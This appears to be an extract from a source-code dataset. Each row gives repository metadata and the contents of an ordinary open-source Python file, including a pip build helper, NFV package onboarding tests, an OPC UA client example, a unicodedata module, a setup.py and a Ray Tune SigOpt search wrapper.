repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
DavidResin/aps-aalto
stitch/cv/lib/python3.4/site-packages/pip/utils/build.py
899
1312
from __future__ import absolute_import import os.path import tempfile from pip.utils import rmtree class BuildDirectory(object): def __init__(self, name=None, delete=None): # If we were not given an explicit directory, and we were not given an # explicit delete option, then we'll default to deleting. if name is None and delete is None: delete = True if name is None: # We realpath here because some systems have their default tmpdir # symlinked to another directory. This tends to confuse build # scripts, so we canonicalize the path by traversing potential # symlinks here. name = os.path.realpath(tempfile.mkdtemp(prefix="pip-build-")) # If we were not given an explicit directory, and we were not given # an explicit delete option, then we'll default to deleting. if delete is None: delete = True self.name = name self.delete = delete def __repr__(self): return "<{} {!r}>".format(self.__class__.__name__, self.name) def __enter__(self): return self.name def __exit__(self, exc, value, tb): self.cleanup() def cleanup(self): if self.delete: rmtree(self.name)
gpl-3.0
open-o/nfvo
lcm/lcm/packages/tests/test_nf.py
1
23203
# Copyright 2016-2017 ZTE Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import mock from rest_framework import status from django.test import TestCase from django.test import Client from lcm.pub.utils import restcall from lcm.pub.utils import fileutil from lcm.pub.nfvi.vim.vimadaptor import VimAdaptor from lcm.pub.database.models import NfPackageModel, VnfPackageFileModel, NfInstModel from lcm.pub.database.models import JobStatusModel, JobModel from lcm.packages.nf_package import NfOnBoardingThread, NfPkgDeletePendingThread from lcm.packages.nf_package import NfPkgDeleteThread from lcm.packages import nf_package from lcm.pub.nfvi.vim.const import VIM_OPENSTACK class TestNfPackage(TestCase): def setUp(self): self.client = Client() NfPackageModel.objects.filter().delete() VnfPackageFileModel.objects.filter().delete() NfInstModel.objects.filter().delete() JobModel.objects.filter().delete() JobStatusModel.objects.filter().delete() self.vnfd_raw_data = { "rawData":{ "instance":{ "metadata":{ "is_shared":False, "plugin_info":"vbrasplugin_1.0", "vendor":"zte", "request_reclassification":False, "name":"vbras", "version":1, "vnf_type":"vbras", "cross_dc":False, "vnfd_version":"1.0.0", "id":"zte_vbras_1.0", "nsh_aware":True }, "nodes":[ { "id":"aaa_dnet_cp_0xu2j5sbigxc8h1ega3if0ld1", "type_name":"tosca.nodes.nfv.ext.zte.CP", "template_name":"aaa_dnet_cp", "properties":{ "bandwidth":{ "type_name":"integer", "value":0 }, "direction":{ "type_name":"string", "value":"bidirectional" }, "vnic_type":{ "type_name":"string", "value":"normal" }, "sfc_encapsulation":{ "type_name":"string", "value":"mac" }, "order":{ "type_name":"integer", "value":2 } }, "relationships":[ { "name":"guest_os", "source_requirement_index":0, "target_node_id":"AAA_image_d8aseebr120nbm7bo1ohkj194", "target_capability_name":"feature" } ] }, { "id":"LB_Image_oj5l2ay8l2g6vcq6fsswzduha", "type_name":"tosca.nodes.nfv.ext.ImageFile", "template_name":"LB_Image", "properties":{ "disk_format":{ "type_name":"string", "value":"qcow2" }, "file_url":{ "type_name":"string", "value":"/SoftwareImages/image-lb" }, "name":{ "type_name":"string", "value":"image-lb" } } } ] }, "model":{ "metadata":{ "is_shared":False, "plugin_info":"vbrasplugin_1.0", "vendor":"zte", "request_reclassification":False, "name":"vbras", "version":1, "vnf_type":"vbras", "cross_dc":False, "vnfd_version":"1.0.0", "id":"zte_vbras_1.0", "nsh_aware":True }, "node_templates":[ { "name":"aaa_dnet_cp", "type_name":"tosca.nodes.nfv.ext.zte.CP", "default_instances":1, "min_instances":0, "properties":{ "bandwidth":{ "type_name":"integer", "value":0 } }, "requirement_templates":[ { "name":"virtualbinding", "target_node_template_name":"AAA", "target_capability_name":"virtualbinding" } ] } ] } } } def tearDown(self): pass def assert_job_result(self, job_id, job_progress, job_detail): jobs = JobStatusModel.objects.filter( jobid=job_id, progress=job_progress, descp=job_detail) self.assertEqual(1, len(jobs)) @mock.patch.object(NfOnBoardingThread, 'run') def test_nf_pkg_on_boarding_normal(self, mock_run): resp = self.client.post("/openoapi/nslcm/v1/vnfpackage", { "csarId": "1", "vimIds": ["1"] }, format='json') self.assertEqual(resp.status_code, status.HTTP_202_ACCEPTED) @mock.patch.object(restcall, 'call_req') def test_nf_pkg_on_boarding_when_on_boarded(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({"onBoardState": "onBoarded"}), '200'] NfOnBoardingThread(csar_id="1", vim_ids=["1"], lab_vim_id="", job_id="2").run() self.assert_job_result("2", 255, "CSAR(1) already onBoarded.") @mock.patch.object(restcall, 'call_req') def test_nf_pkg_on_boarding_when_on_boarding(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "onBoardState": "non-onBoarded", "processState": "onBoarding" }), '200'] NfOnBoardingThread(csar_id="2", vim_ids=["1"], lab_vim_id="", job_id="3").run() self.assert_job_result("3", 255, "CSAR(2) is onBoarding now.") @mock.patch.object(restcall, 'call_req') def test_nf_on_boarding_when_nfd_already_exists(self, mock_call_req): mock_vals = { "/openoapi/catalog/v1/csars/2": [0, json.JSONEncoder().encode({ "onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200']} def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfPackageModel(uuid="1", nfpackageid="2", vnfdid="zte_vbras_1.0").save() NfOnBoardingThread(csar_id="2", vim_ids=["1"], lab_vim_id="", job_id="4").run() self.assert_job_result("4", 255, "NFD(zte_vbras_1.0) already exists.") @mock.patch.object(restcall, 'call_req') @mock.patch.object(fileutil, 'download_file_from_http') @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'create_image') @mock.patch.object(VimAdaptor, 'get_image') def test_nf_on_boarding_when_successfully(self, mock_get_image, mock_create_image, mock__init__, mock_download_file_from_http, mock_call_req): mock_download_file_from_http.return_value = True, "/root/package" mock_vals = { "/openoapi/catalog/v1/csars/2": [0, json.JSONEncoder().encode({ "onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200'], "/openoapi/catalog/v1/csars/2/files?relativePath=/SoftwareImages/image-lb": [0, json.JSONEncoder().encode({ "csar_file_info": [{"downloadUri": "8"}, {"localPath": "9"}]}), '200'], "/openoapi/extsys/v1/vims": [0, json.JSONEncoder().encode([{ "vimId": "1", "type": VIM_OPENSTACK, "url": "/root/package", "userName": "tom", "password": "tom", "tenant": "10"}]), '200'], "/openoapi/catalog/v1/csars/2?onBoardState=onBoarded": [0, '{}', 200], "/openoapi/catalog/v1/csars/2?operationalState=Enabled": [0, '{}', 200], "/openoapi/catalog/v1/csars/2?processState=normal": [0, '{}', 200]} mock_create_image.return_value = [0, {"id": "30", "name": "jerry", "res_type": 0}] mock__init__.return_value = None mock_get_image.return_value = [0, {"id": "30", "name": "jerry", "size": "60", "status": "active"}] def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfOnBoardingThread(csar_id="2", vim_ids=["1"], lab_vim_id="", job_id="4").run() self.assert_job_result("4", 100, "CSAR(2) onBoarding successfully.") @mock.patch.object(restcall, 'call_req') @mock.patch.object(fileutil, 'download_file_from_http') @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'create_image') @mock.patch.object(VimAdaptor, 'get_image') def test_nf_on_boarding_when_timeout(self, mock_get_image, mock_create_image, mock__init__, mock_download_file_from_http, mock_call_req): nf_package.MAX_RETRY_TIMES = 2 nf_package.SLEEP_INTERVAL_SECONDS = 1 mock_download_file_from_http.return_value = True, "/root/package" mock_vals = { "/openoapi/catalog/v1/csars/3": [0, json.JSONEncoder().encode({"onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200'], "/openoapi/catalog/v1/csars/3/files?relativePath=/SoftwareImages/image-lb": [0, json.JSONEncoder().encode({ "csar_file_info": [{"downloadUri": "8"}, {"localPath": "9"}]}), '200'], "/openoapi/catalog/v1/csars/3?processState=onBoardFailed": [0, '{}', 200], "/openoapi/extsys/v1/vims": [0, json.JSONEncoder().encode([{ "vimId": "1", "type": VIM_OPENSTACK, "url": "/root/package", "userName": "tom", "password": "tom", "tenant": "10"}]), 200]} mock_create_image.return_value = [0, {"id": "30", "name": "jerry", "res_type": 0}] mock__init__.return_value = None mock_get_image.return_value = [0, {"id": "30", "name": "jerry", "size": "60", "status": "0"}] def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfOnBoardingThread(csar_id="3", vim_ids=["1"], lab_vim_id="", job_id="6").run() self.assert_job_result("6", 255, "Failed to create image:timeout(2 seconds.)") @mock.patch.object(restcall, 'call_req') @mock.patch.object(fileutil, 'download_file_from_http') @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'create_image') def test_nf_on_boarding_when_failed_to_create_image(self, mock_create_image, mock__init__, mock_download_file_from_http, mock_call_req): mock_download_file_from_http.return_value = True, "/root/package" mock_vals = { "/openoapi/catalog/v1/csars/5": [0, json.JSONEncoder().encode({ "onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200'], "/openoapi/catalog/v1/csars/5/files?relativePath=/SoftwareImages/image-lb": [0, json.JSONEncoder().encode({ "csar_file_info": [{"downloadUri": "8"}, {"localPath": "9"}]}), '200'], "/openoapi/catalog/v1/csars/5?processState=onBoardFailed": [0, '{}', 200], "/openoapi/extsys/v1/vims": [0, json.JSONEncoder().encode([{ "vimId": "1", "type": VIM_OPENSTACK, "url": "/root/package", "userName": "tom", "password": "tom", "tenant": "10"}]), '200']} mock_create_image.return_value = [1, 'Unsupported image format.'] mock__init__.return_value = None def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfOnBoardingThread(csar_id="5", vim_ids=["1"], lab_vim_id="", job_id="8").run() self.assert_job_result("8", 255, "Failed to create image:Unsupported image format.") ######################################################################### @mock.patch.object(restcall, 'call_req') def test_get_csar_successfully(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "name": "1", "provider": "2", "version": "3", "operationalState": "4", "usageState": "5", "onBoardState": "6", "processState": "7", "deletionPending": "8", "downloadUri": "9", "createTime": "10", "modifyTime": "11", "format": "12", "size": "13" }), '200'] NfPackageModel(uuid="1", vnfdid="001", vendor="vendor", vnfdversion="1.2.0", vnfversion="1.1.0", nfpackageid="13").save() VnfPackageFileModel(id="1", filename="filename", imageid="00001", vimid="1", vimuser="001", tenant="12", status="1", vnfpid="13").save() NfInstModel(nfinstid="1", mnfinstid="001", nf_name="name", package_id="13").save() resp = self.client.get("/openoapi/nslcm/v1/vnfpackage/13") self.assertEqual(resp.status_code, status.HTTP_200_OK) expect_data = { "csarId": '13', "packageInfo": { "vnfdId": "001", "vnfdProvider": "vendor", "vnfdVersion": "1.2.0", "vnfVersion": "1.1.0", "name": "1", "provider": "2", "version": "3", "operationalState": "4", "usageState": "5", "onBoardState": "6", "processState": "7", "deletionPending": "8", "downloadUri": "9", "createTime": "10", "modifyTime": "11", "format": "12", "size": "13"}, "imageInfo": [{ "index": "0", "fileName": "filename", "imageId": "00001", "vimId": "1", "vimUser": "001", "tenant": "12", "status": "1"}], "vnfInstanceInfo": [{ "vnfInstanceId": "1", "vnfInstanceName": "name"}]} self.assertEqual(expect_data, resp.data) ######################################################################### @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_successfully(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "processState": "deleting"}), "200"] NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "Delete pending CSAR(1) successfully.") @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_deleting(self, mock_call_req): NfPackageModel(uuid="01", nfpackageid="1").save() mock_call_req.return_value = [0, json.JSONEncoder().encode({ "processState": "deleting"}), "200"] NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "CSAR(1) is deleting now.") @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_not_deletion_pending(self, mock_call_req): NfPackageModel(uuid="01", nfpackageid="1").save() mock_call_req.return_value = [0, json.JSONEncoder().encode({ "deletionPending": "false"}), "200"] NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "CSAR(1) need not to be deleted.") @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_in_using(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "processState": "normal"}), "200"] NfPackageModel(uuid="01", nfpackageid="1").save() NfInstModel(nfinstid="01", package_id="1").save() NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "CSAR(1) is in using, cannot be deleted.") @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'delete_image') @mock.patch.object(restcall, 'call_req') def test_delete_csarr_when_exception(self, mock_call_req, mock_delete_image, mock_init_): mock_vals = { ("/openoapi/catalog/v1/csars/1", "DELETE"): [1, "{}", "400"], ("/openoapi/catalog/v1/csars/1?processState=deleting", "PUT"): [0, "{}", "200"], ("/openoapi/catalog/v1/csars/1?processState=deleteFailed", "PUT"): [0, "{}", "200"], ("/openoapi/catalog/v1/csars/1", "GET"): [0, json.JSONEncoder().encode({"processState": "normal"}), "200"], ("/openoapi/extsys/v1/vims", "GET"): [0, json.JSONEncoder().encode([{"vimId": "002", "url": "url_test", "userName": "test01", "password": "123456", "tenant": "test"}]), "200"]} mock_delete_image.return_value = [0, "", '200'] def side_effect(*args): return mock_vals[(args[4], args[5])] mock_call_req.side_effect = side_effect mock_init_.return_value = None VnfPackageFileModel(vnfpid="1", imageid="001", vimid="002").save() NfPackageModel(uuid="01", nfpackageid="1").save() NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 255, "Failed to delete CSAR(1) from catalog.") @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'delete_image') @mock.patch.object(restcall, 'call_req') def test_delete_csar_when_successfully(self, mock_call_req, mock_delete_image, mock_init_): mock_vals = { ("/openoapi/catalog/v1/csars/1", "DELETE"): [0, json.JSONEncoder().encode({"successfully": "successfully"}), "200"], ("/openoapi/catalog/v1/csars/1?processState=deleting", "PUT"): [0, json.JSONEncoder().encode({"successfully": "successfully"}), "200"], ("/openoapi/catalog/v1/csars/1?processState=deleteFailed", "PUT"): [0, json.JSONEncoder().encode({"successfully": "successfully"}), "200"], ("/openoapi/catalog/v1/csars/1", "GET"): [0, json.JSONEncoder().encode({"notProcessState": "notProcessState"}), "200"], ("/openoapi/extsys/v1/vims", "GET"): [0, json.JSONEncoder().encode([{ "vimId": "002", "url": "url_test", "userName": "test01", "password": "123456", "tenant": "test"}]), "200"]} mock_delete_image.return_value = [0, json.JSONEncoder().encode({"test": "test"}), '200'] def side_effect(*args): return mock_vals[(args[4], args[5])] mock_call_req.side_effect = side_effect mock_init_.return_value = None VnfPackageFileModel(vnfpid="1", imageid="001", vimid="002").save() NfPackageModel(uuid="01", nfpackageid="1").save() NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "Delete CSAR(1) successfully.") ######################################################################### @mock.patch.object(restcall, 'call_req') def test_delete_nf_pkg_when_deleting(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({"processState": "deleting"}), '200'] NfPkgDeleteThread(csar_id="1", job_id="2").run() self.assert_job_result("2", 100, "CSAR(1) is deleting now.") def test_get_nf_csars_normal(self): NfPackageModel(uuid="01", nfpackageid="1", vnfdid="2").save() resp = self.client.get("/openoapi/nslcm/v1/vnfpackage") self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(1, len(resp.data["csars"])) self.assertEqual("1", resp.data["csars"][0]["csarId"]) self.assertEqual("2", resp.data["csars"][0]["vnfdId"])
apache-2.0
emilk/sproxel
distro/common/lib/ctypes/macholib/dylib.py
59
2107
###################################################################### # This file should be kept compatible with Python 2.3, see PEP 291. # ###################################################################### """ Generic dylib path manipulation """ import re __all__ = ['dylib_info'] DYLIB_RE = re.compile(r"""(?x) (?P<location>^.*)(?:^|/) (?P<name> (?P<shortname>\w+?) (?:\.(?P<version>[^._]+))? (?:_(?P<suffix>[^._]+))? \.dylib$ ) """) def dylib_info(filename): """ A dylib name can take one of the following four forms: Location/Name.SomeVersion_Suffix.dylib Location/Name.SomeVersion.dylib Location/Name_Suffix.dylib Location/Name.dylib returns None if not found or a mapping equivalent to: dict( location='Location', name='Name.SomeVersion_Suffix.dylib', shortname='Name', version='SomeVersion', suffix='Suffix', ) Note that SomeVersion and Suffix are optional and may be None if not present. """ is_dylib = DYLIB_RE.match(filename) if not is_dylib: return None return is_dylib.groupdict() def test_dylib_info(): def d(location=None, name=None, shortname=None, version=None, suffix=None): return dict( location=location, name=name, shortname=shortname, version=version, suffix=suffix ) assert dylib_info('completely/invalid') is None assert dylib_info('completely/invalide_debug') is None assert dylib_info('P/Foo.dylib') == d('P', 'Foo.dylib', 'Foo') assert dylib_info('P/Foo_debug.dylib') == d('P', 'Foo_debug.dylib', 'Foo', suffix='debug') assert dylib_info('P/Foo.A.dylib') == d('P', 'Foo.A.dylib', 'Foo', 'A') assert dylib_info('P/Foo_debug.A.dylib') == d('P', 'Foo_debug.A.dylib', 'Foo_debug', 'A') assert dylib_info('P/Foo.A_debug.dylib') == d('P', 'Foo.A_debug.dylib', 'Foo', 'A', 'debug') if __name__ == '__main__': test_dylib_info()
bsd-3-clause
bitkeeper/python-opcua
examples/client_to_kepware.py
1
1723
import sys sys.path.insert(0, "..") import logging from opcua import Client from opcua import uaprotocol as ua class SubHandler(object): """ Client to subscription. It will receive events from server """ def datachange_notification(self, node, val, data): print("Python: New data change event", node, val) def event_notification(self, event): print("Python: New event", event) if __name__ == "__main__": #from IPython import embed logging.basicConfig(level=logging.WARN) client = Client("opc.tcp://192.168.56.100:49320/OPCUA/SimulationServer/") #client = Client("opc.tcp://192.168.56.100:4840/OPCUA/SimulationServer/") #client = Client("opc.tcp://olivier:olivierpass@localhost:53530/OPCUA/SimulationServer/") try: client.connect() root = client.get_root_node() print("Root is", root) print("childs of root are: ", root.get_children()) print("name of root is", root.get_browse_name()) objects = client.get_objects_node() print("childs og objects are: ", objects.get_children()) tag1 = client.get_node("ns=2;s=Channel1.Device1.Tag1") print("tag1 is: {0} with value {1} ".format(tag1, tag1.get_value())) tag2 = client.get_node("ns=2;s=Channel1.Device1.Tag2") print("tag2 is: {0} with value {1} ".format(tag2, tag2.get_value())) handler = SubHandler() sub = client.create_subscription(500, handler) handle = sub.subscribe_data_change(tag1) handle = sub.subscribe_data_change(tag2) from IPython import embed embed() sub.unsubscribe(handle) sub.delete() finally: client.disconnect()
lgpl-3.0
clumsy/intellij-community
python/lib/Lib/unicodedata.py
69
6437
from bisect import bisect_left import operator import java.lang.Character # XXX - this is intended as a stopgap measure until 2.5.1, which will have a Java implementation # requires java 6 for `normalize` function # only has one version of the database # does not normalized ideographs _codepoints = {} _eaw = {} _names = {} _segments = [] _eaw_segments = [] Nonesuch = object() def get_int(col): try: return int(col) except ValueError: return None def get_yn(col): if col == 'Y': return 1 else: return 0 def get_numeric(col): try: return float(col) except ValueError: try: a, b = col.split('/') return float(a)/float(b) except: return None def init_unicodedata(data): for row in data: cols = row.split(';') codepoint = int(cols[0], 16) name = cols[1] if name == '<CJK Ideograph, Last>': lookup_name = 'CJK UNIFIED IDEOGRAPH' else: lookup_name = name data = ( cols[2], get_int(cols[3]), cols[4], cols[5], get_int(cols[6]), get_int(cols[7]), get_numeric(cols[8]), get_yn(cols[9]), lookup_name, ) if name.find('First') >= 0: start = codepoint elif name.find('Last') >= 0: _segments.append((start, (start, codepoint), data)) else: _names[name] = unichr(codepoint) _codepoints[codepoint] = data def init_east_asian_width(data): for row in data: if row.startswith('#'): continue row = row.partition('#')[0] cols = row.split(';') if len(cols) < 2: continue cr = cols[0].split('..') width = cols[1].rstrip() if len(cr) == 1: codepoint = int(cr[0], 16) _eaw[codepoint] = width else: start = int(cr[0], 16) end = int(cr[1], 16) _eaw_segments.append((start, (start, end), width)) # xxx - need to normalize the segments, so # <CJK Ideograph, Last> ==> CJK UNIFIED IDEOGRAPH; # may need to do some sort of analysis against CPython for the normalization! def name(unichr, default=None): codepoint = get_codepoint(unichr, "name") v = _codepoints.get(codepoint, None) if v is None: v = check_segments(codepoint, _segments) if v is not None: return "%s-%X" % (v[8], codepoint) if v is None: if default is not Nonesuch: return default raise ValueError() return v[8] # xxx - also need to add logic here so that if it's CJK UNIFIED # IDEOGRAPH-8000, we go against the segment to verify the prefix def lookup(name): return _names[name] def check_segments(codepoint, segments): i = bisect_left(segments, (codepoint,)) if i < len(segments): segment = segments[i - 1] if codepoint <= segment[1][1]: return segment[2] return None def get_codepoint(unichr, fn=None): if not(isinstance(unichr, unicode)): raise TypeError(fn, "() argument 1 must be unicode, not " + type(unichr)) if len(unichr) > 1 or len(unichr) == 0: raise TypeError("need a single Unicode character as parameter") return ord(unichr) def get_eaw(unichr, default, fn): codepoint = get_codepoint(unichr, fn) v = _eaw.get(codepoint, None) if v is None: v = check_segments(codepoint, _eaw_segments) if v is None: if default is not Nonesuch: return default raise ValueError() return v def get(unichr, default, fn, getter): codepoint = get_codepoint(unichr, fn) data = _codepoints.get(codepoint, None) if data is None: data = check_segments(codepoint, _segments) if data is None: if default is not Nonesuch: return default raise ValueError() v = getter(data) if v is None: if default is not Nonesuch: return default raise ValueError() else: return v category_getter = operator.itemgetter(0) combining_getter = operator.itemgetter(1) bidirectional_getter = operator.itemgetter(2) decomposition_getter = operator.itemgetter(3) decimal_getter = operator.itemgetter(4) digit_getter = operator.itemgetter(5) numeric_getter = operator.itemgetter(6) mirrored_getter = operator.itemgetter(7) def decimal(unichr, default=Nonesuch): return get(unichr, default, 'decimal', decimal_getter) def decomposition(unichr, default=''): return get(unichr, default, 'decomposition', decomposition_getter) def digit(unichr, default=Nonesuch): return get(unichr, default, 'digit', digit_getter) def numeric(unichr, default=Nonesuch): return get(unichr, default, 'numeric', numeric_getter) def category(unichr): return get(unichr, 'Cn', 'catgegory', category_getter) def bidirectional(unichr): return get(unichr, '', 'bidirectional', bidirectional_getter) def combining(unichr): return get(unichr, 0, 'combining', combining_getter) def mirrored(unichr): return get(unichr, 0, 'mirrored', mirrored_getter) def east_asian_width(unichr): return get_eaw(unichr, 'N', 'east_asian_width') def jymirrored(unichr): return java.lang.Character.isMirrored(get_codepoint(unichr, 'mirrored')) try: from java.text import Normalizer _forms = { 'NFC': Normalizer.Form.NFC, 'NFKC': Normalizer.Form.NFKC, 'NFD': Normalizer.Form.NFD, 'NFKD': Normalizer.Form.NFKD } def normalize(form, unistr): """ Return the normal form 'form' for the Unicode string unistr. Valid values for form are 'NFC', 'NFKC', 'NFD', and 'NFKD'. """ try: normalizer_form = _forms[form] except KeyError: raise ValueError('invalid normalization form') return Normalizer.normalize(unistr, normalizer_form) except ImportError: pass def init(): import pkgutil import os.path import StringIO import sys my_path = os.path.dirname(__file__) loader = pkgutil.get_loader('unicodedata') init_unicodedata(StringIO.StringIO(loader.get_data(os.path.join(my_path, 'UnicodeData.txt')))) init_east_asian_width(StringIO.StringIO(loader.get_data(os.path.join(my_path, 'EastAsianWidth.txt')))) init()
apache-2.0
EDRN/CancerDataExpo
src/edrn.rdf/setup.py
2
2657
# encoding: utf-8 # Copyright 2008-2011 California Institute of Technology. ALL RIGHTS # RESERVED. U.S. Government Sponsorship acknowledged. from setuptools import setup, find_packages import os.path # Package data # ------------ _name = 'edrn.rdf' _version = '1.3.8' _description = 'EDRN RDF Server' _author = 'Sean Kelly' _authorEmail = '[email protected]' _maintainer = 'Sean Kelly' _maintainerEmail = '[email protected]' _license = 'ALv2' _namespaces = ['edrn'] _zipSafe = False _keywords = 'rdf web zope plone cancer bioinformatics detection informatics edrn' _testSuite = 'edrn.rdf.tests.test_suite' _entryPoints = { 'z3c.autoinclude.plugin': ['target=plone'], } _requirements = [ 'collective.autopermission', 'pysolr', 'Pillow', 'plone.app.dexterity[relations]', 'plone.app.relationfield', 'plone.behavior', 'Products.CMFPlone', 'rdflib==4.2.2', 'setuptools', 'z3c.relationfield', 'suds2', 'zope.app.intid', ] _extras = { 'test': ['plone.app.testing', 'rdfextras'], } _classifiers = [ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Framework :: Plone', 'Intended Audience :: Healthcare Industry', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Scientific/Engineering :: Bio-Informatics', 'Topic :: Software Development :: Libraries :: Python Modules', ] # Setup Metadata # -------------- def _read(*rnames): return open(os.path.join(os.path.dirname(__file__), *rnames)).read() _header = '*' * len(_name) + '\n' + _name + '\n' + '*' * len(_name) _longDescription = _header + '\n\n' + _read('README.rst') + '\n\n' + _read('docs', 'INSTALL.txt') + '\n\n' \ + _read('docs', 'HISTORY.txt') + '\n' open('doc.txt', 'w').write(_longDescription) setup( author=_author, author_email=_authorEmail, classifiers=_classifiers, description=_description, entry_points=_entryPoints, extras_require=_extras, include_package_data=True, install_requires=_requirements, keywords=_keywords, license=_license, long_description=_longDescription, maintainer=_maintainer, maintainer_email=_maintainerEmail, name=_name, namespace_packages=_namespaces, packages=find_packages(exclude=['ez_setup', 'distribute_setup', 'bootstrap']), url='https://github.com/EDRN/' + _name, version=_version, zip_safe=_zipSafe, )
apache-2.0
stephanie-wang/ray
python/ray/tune/suggest/sigopt.py
1
5550
import copy import os import logging import pickle try: import sigopt as sgo except ImportError: sgo = None from ray.tune.suggest.suggestion import SuggestionAlgorithm logger = logging.getLogger(__name__) class SigOptSearch(SuggestionAlgorithm): """A wrapper around SigOpt to provide trial suggestions. Requires SigOpt to be installed. Requires user to store their SigOpt API key locally as an environment variable at `SIGOPT_KEY`. Parameters: space (list of dict): SigOpt configuration. Parameters will be sampled from this configuration and will be used to override parameters generated in the variant generation process. name (str): Name of experiment. Required by SigOpt. max_concurrent (int): Number of maximum concurrent trials supported based on the user's SigOpt plan. Defaults to 1. metric (str): The training result objective value attribute. mode (str): One of {min, max}. Determines whether objective is minimizing or maximizing the metric attribute. Example: >>> space = [ >>> { >>> 'name': 'width', >>> 'type': 'int', >>> 'bounds': { >>> 'min': 0, >>> 'max': 20 >>> }, >>> }, >>> { >>> 'name': 'height', >>> 'type': 'int', >>> 'bounds': { >>> 'min': -100, >>> 'max': 100 >>> }, >>> }, >>> ] >>> algo = SigOptSearch( >>> space, name="SigOpt Example Experiment", >>> max_concurrent=1, metric="mean_loss", mode="min") """ def __init__(self, space, name="Default Tune Experiment", max_concurrent=1, reward_attr=None, metric="episode_reward_mean", mode="max", **kwargs): assert sgo is not None, "SigOpt must be installed!" assert type(max_concurrent) is int and max_concurrent > 0 assert "SIGOPT_KEY" in os.environ, \ "SigOpt API key must be stored as environ variable at SIGOPT_KEY" assert mode in ["min", "max"], "`mode` must be 'min' or 'max'!" if reward_attr is not None: mode = "max" metric = reward_attr logger.warning( "`reward_attr` is deprecated and will be removed in a future " "version of Tune. " "Setting `metric={}` and `mode=max`.".format(reward_attr)) if "use_early_stopped_trials" in kwargs: logger.warning( "`use_early_stopped_trials` is not used in SigOptSearch.") self._max_concurrent = max_concurrent self._metric = metric if mode == "max": self._metric_op = 1. elif mode == "min": self._metric_op = -1. self._live_trial_mapping = {} # Create a connection with SigOpt API, requires API key self.conn = sgo.Connection(client_token=os.environ["SIGOPT_KEY"]) self.experiment = self.conn.experiments().create( name=name, parameters=space, parallel_bandwidth=self._max_concurrent, ) super(SigOptSearch, self).__init__(**kwargs) def _suggest(self, trial_id): if self._num_live_trials() >= self._max_concurrent: return None # Get new suggestion from SigOpt suggestion = self.conn.experiments( self.experiment.id).suggestions().create() self._live_trial_mapping[trial_id] = suggestion return copy.deepcopy(suggestion.assignments) def on_trial_result(self, trial_id, result): pass def on_trial_complete(self, trial_id, result=None, error=False, early_terminated=False): """Notification for the completion of trial. If a trial fails, it will be reported as a failed Observation, telling the optimizer that the Suggestion led to a metric failure, which updates the feasible region and improves parameter recommendation. Creates SigOpt Observation object for trial. """ if result: self.conn.experiments(self.experiment.id).observations().create( suggestion=self._live_trial_mapping[trial_id].id, value=self._metric_op * result[self._metric], ) # Update the experiment object self.experiment = self.conn.experiments(self.experiment.id).fetch() elif error or early_terminated: # Reports a failed Observation self.conn.experiments(self.experiment.id).observations().create( failed=True, suggestion=self._live_trial_mapping[trial_id].id) del self._live_trial_mapping[trial_id] def _num_live_trials(self): return len(self._live_trial_mapping) def save(self, checkpoint_dir): trials_object = (self.conn, self.experiment) with open(checkpoint_dir, "wb") as outputFile: pickle.dump(trials_object, outputFile) def restore(self, checkpoint_dir): with open(checkpoint_dir, "rb") as inputFile: trials_object = pickle.load(inputFile) self.conn = trials_object[0] self.experiment = trials_object[1]
apache-2.0
aetilley/scikit-learn
examples/svm/plot_svm_anova.py
250
2000
